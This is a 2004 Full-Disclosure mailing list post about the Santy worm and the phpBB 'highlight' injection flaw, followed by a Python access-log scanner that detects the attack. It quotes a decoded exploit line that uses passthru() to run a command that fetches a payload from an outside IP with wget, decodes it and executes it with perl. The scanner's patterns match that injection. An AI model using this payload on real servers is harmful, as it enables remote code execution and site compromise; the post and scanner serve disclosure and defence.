
Full Disclosure Mailing List Archive

From: Paul Laudanski (zx@castlecops.com)
Date: Thu Dec 23 2004 - 23:40:46 EST


On Thu, 23 Dec 2004, Patrick Nolan wrote:

> A bot is not uploaded, not sure where that came from.
> And by now, it is not expected to be spreading at all, thanks to the
> interruption in search requests by Google.

There are a couple of posts going on about this; for instance, take this
article:

http://www.cbronline.com/article_news.asp?guid=366C3494-1446-4A8B-973C-F67044266D35

[quote]
"Santy gets easily corrupted," F-Secure Corp's Mikko Hypponen said. "The
exploit it uses is only able to transfer around 20 bytes of data at a
time. So the worm transfers itself from one web site to another in small
chunks."

"If a chunk gets missing, the worm might still work fine... or it might
fail," Hypponen told ComputerWire. "More generations there are, more
likely it is to fail because of this."
[/quote]

Compare that to an exploit that is posted @bugtraq:

http://www.securityfocus.com/archive/1/385208

(decoded)

[quote]
rush=echo _START_; cd /tmp;wget 128.174.137.230/bn -O .b; perl -pe
y/thmvdw0987654321uoiea/aeiou1234567890wdvthm/
.b| perl; rm -f .b *.pl b0t*; echo _END_
highlight='.passthru($HTTP_GET_VARS[rush]).'
[/quote]

It is making use of the highlight exploit in pre phpbb 2.0.11.

Even though the 'worm' itself may be hindered, we can certainly expect
script kiddies to attempt these manually.

http://www.modsecurity.org/blog/archives/000046.html

Now that is catching the single quote in the highlight argument.

-- 
Regards,
Paul Laudanski - Computer Cops, LLC. CEO & Founder
CastleCops(SM) - http://castlecops.com
Promoting education and health in online security and privacy.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
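As an added example (not part of Paul's post, the bugtraq advisory or the ModSecurity blog entry he links), the following Python log scanner applies the same idea as the ModSecurity rule described at the end of the post: it flags any request whose `highlight` parameter, after URL decoding, contains a single quote or the string `passthru`. The access-log lines, client addresses and forum paths are constructed samples, not real traffic; the bounded repeated decoding is a design choice so that a value that was percent-encoded more than once is still inspected in its final form.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in Apache combined log format (not real traffic).
# Line 2 carries a double-encoded injection into the highlight argument,
# line 3 a bare single-quote probe, lines 1 and 4 are ordinary requests.
SAMPLE_LOG = """\
10.0.0.5 - - [23/Dec/2004:21:10:01 -0500] "GET /viewtopic.php?t=12&highlight=linux HTTP/1.1" 200 8421 "-" "Mozilla/4.0"
10.0.0.9 - - [23/Dec/2004:21:10:07 -0500] "GET /viewtopic.php?t=7&highlight=%2527.passthru(%2524HTTP_GET_VARS%255Brush%255D).%2527 HTTP/1.0" 200 512 "-" "-"
10.0.0.7 - - [23/Dec/2004:21:10:09 -0500] "GET /viewtopic.php?t=7&highlight=test%27 HTTP/1.0" 200 512 "-" "-"
10.0.0.3 - - [23/Dec/2004:21:11:30 -0500] "GET /index.php HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""

# Pull the request target out of the quoted request line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def fully_unquote(value: str, rounds: int = 3) -> str:
    """URL-decode repeatedly (bounded) so multiply-encoded values are seen decoded."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def decoded_highlight_values(target: str) -> List[str]:
    """Return every decoded value of the highlight query parameter in a request target."""
    query = urlsplit(target).query
    # parse_qs already decodes one layer; fully_unquote handles any further layers.
    return [fully_unquote(v) for v in parse_qs(query, keep_blank_values=True).get("highlight", [])]


def is_suspicious_highlight(value: str) -> bool:
    """The rule from the post: a single quote in highlight is never legitimate search input here;
    the passthru() call is the payload shape seen in the decoded bugtraq exploit."""
    return "'" in value or "passthru" in value.lower()


def scan_log(text: str) -> List[Dict[str, str]]:
    """Scan access-log text and return one record per request with a suspicious highlight value."""
    hits: List[Dict[str, str]] = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = match.group("target")
        for value in decoded_highlight_values(target):
            if is_suspicious_highlight(value):
                hits.append({
                    "client": line.split(" ", 1)[0],
                    "target": target,
                    "highlight": value,
                })
                break  # one record per request line is enough
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['client']} highlight={hit['highlight']!r} target={hit['target']}")
```

Run against the constructed sample, the scanner reports the second and third lines and leaves the ordinary searches alone; the decoded `highlight` value in each record is what an analyst would compare against the `'.passthru($HTTP_GET_VARS[rush]).'` string from the decoded exploit above. The same single-quote test is what a web application firewall rule on the `highlight` argument enforces before the request reaches phpBB.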

